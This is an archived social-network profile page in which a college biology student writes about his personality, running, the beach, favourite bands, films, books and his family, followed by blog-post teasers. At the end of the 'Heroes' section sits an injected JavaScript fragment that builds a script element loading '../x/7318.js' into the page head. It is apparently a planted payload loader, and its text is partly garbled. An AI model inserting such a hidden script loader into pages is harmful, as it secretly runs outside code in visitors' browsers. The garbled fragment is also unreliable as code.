About Me

I'm a pretty laid back kinda guy who's pretty easy to get along with (at least I think so). I'm initially a 'quiet' guy who likes to get to know someone better before I warm up to them....but I warm quickly ;p. I don't do drama, whether it be with an Ex or whatever. I really value honesty and 'real' people. I think friends should be like an un-biased mirror, letting you see yourself for how you really are and not how you want to see yourself, but the whole 'mirror' depends upon having those true and genuine friends.I like to go out, or just stay home. It really doesn't matter, as long as I'm with people I can have a good time with. I'm pretty up-beat and love to joke around. You'll know if I really like you if I poke fun at you ; p (now you really wanna know me right?lol). I've almost always got a smile on my face and I love making other people smile as well. Humor is the best!! I'm always up for a great night out, just as long as it's not tooooooooo illegal ;p or before a final(gotta be erudite). Yeah, I have my priorities clearly defined, but I still like to 'let loose and let it all hang out' too!!! I'm a bio major and am somewhwat set on working in a lab, but there's a million and one directions I could go.Whether it's social or personal, I'm a dedicated person. I like doing nice things for others, whether it's being a caring ear, the voice of reason, just doing something small to make someone feel special or "other". I'm a hard worker because I like the personal satisfaction in knowing that I completed something to the best of my ability. I can get pretty tied up with school and work, but I ALWAYS make time for friends, they give me so much. You can't always work right??I love running and just being active in general.

My Interests

Welll(cracks knuckles)...I love biology(shocking since I'm a bio major). I think stick shift is AMAZING!! Smiles. MAH SWEETIE!!!! Eating? Dancin' badly. Just chillaxin'(usually with music). The beach. RUNNING. I love track and field!! I wish I had more time to do it again.. I think my favorite event was (and still is) the 400m...I think I'm one of the few cause that event righteously kicks your butt!! I enjoy the company of good friends(who doesn't right?) and reading (sadly it's true...).If I had one place that I could be right now, it would be the beach. Nothing is more amazing then sand between your toes, the fresh salty spray of the ocean across your body, and that special someone to share it with. Whether it's with a best friend, group of friends or with a lover, the beach is always the place for me. And hey, where else are you gonna see a veritable smorgishboard(SP?) of HOTNESS?I'm also really into learning new things from friends both old and new, past and present. I think my true friends have really made me a much better person and a much smarter person.

I'd like to meet:

Cool, motivated, humerous and easy going people!!!

Music:

I like pretty much anything that sounds good... but I guess I am a little more biased toward alternative/Rock. Here's some of the stuff I have been listening to as of late....Autopilot-Off, Audioslave, Beales,Black Eyed Peas, Blink 182, Ciara, DashboardConfessional,Fall Out Boy, GavinDeGraw,Gwen Stefani, Green Day, Hawthorne Heights, Hey Mercedes, HomeGrown, Jack Johnson, Jet,John Mayer,Hot Hot Heat, Howie Day,James Morrison Lauryn Hill, Letter Kills, Lit, Linkin Park, Maroon5, Matchbox 20,Mest, Midtown, MxPx, Mya, My Chemical Romance, Muse, No Motiv, Oasis,Ok go ,Relient K,Riddilin' Kids, Rooney, Saves the Day, Something Corporate, Story of the Year, Strokes, Stroke 9, Sugarcult, Sum 41, Switchfoot, Taking back Sunday, The All American Rejects, The Ataris, The Killers, The Living End,The Stills, The Strokes,Thrice Trapt, Travis, Trust Co., Unwritten Law, Weezer (whoa, its been alphabized!!)

Movies:

The first Matrix, Momento, the first Jurasic Park (seems like sequals just aren't as good), Pay it forward, Lord of the Rings series and of course Harry Potter...

Television:

CSI, Heros, Phill of the future, Grey's Anatomy, Myth Busters, Yan can cook(cause I can't ; P )...

Books:

Some good ones.??? Red Badge of courage, Twenty One Balloons, The Things they carried, James and the Giant Peach, A tale of two cities, and ANYTHING that is in no way related to WALDEN and his accursed pond!!! All I have to say is 'thank-you pink monkey!!".

Heroes:

Well, one person that has always seemed to be able to do anything is my mom(bet everyone says that one, but I could care less). She's gone from being dirt poor, to being a successful working mother who always makes time for kids and goes the extra mile to make sure that we have everything that we need to be happy. It's amazing how she is able to do all the things that she does on a daily basis and still be able to put up with my sister and myself. One of the most important things that I have come to learn from her is how to seperate work/school life from your personal life. I think sometimes we all have those 'bad days' and inadvertantly dump it on those close us. Just because you have a bad day at school doesn't mean that everyone else has to have one as well. The other person would be my dad because he has a work ethic that rivals that of anyone that I know. It's not enough to just 'get it done', but to get it done to level above and beyond the expected.Of course I can't not mention my sweetie/partner in crime. Why is such a person my hero? Because I've never met anyone that makes me want to be a better person for myself, other people and for him. I can't say that I am a perfect person, but when I'm around him or I think of him I know I can be that better person. I've made him into a myspacer and for some reason my life feels quite accomplished...because I also got my other super awesome-cool-tasctic friends to join also!!!Oh yeah, anyone that's ever taken a chance in life and dared to venture into the uknown...mad props to all you people!! .."var s=document·('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"

I've been spending the past few days cleaning up my graduation status. My dilema is that I can't get my degree without two classes I will need to take after I walk, but if I walk I won't be able to ta...

one of those tests

I feel as if I'm being tested. Not by the people around, but by life. I don't know if it's really appropriate to personify 'life' but I'm going to do it anyways. I don't know if I've ever been more st...

Slow people

It seems that slow people love to congregate around and come out of the Sierra & Jerome Richfield buildings. It's perfect that they're right next to eachother aas well. I mean "slow" physically, not m...

A feeling of urgency

6-6-6

I'm a little bit confused as to why 6-6-6 is a day that will bring some big event like an earthquake. Nothing really happened on 3-3-3, nor did anything really significant happen on 9-9-9. I know that...
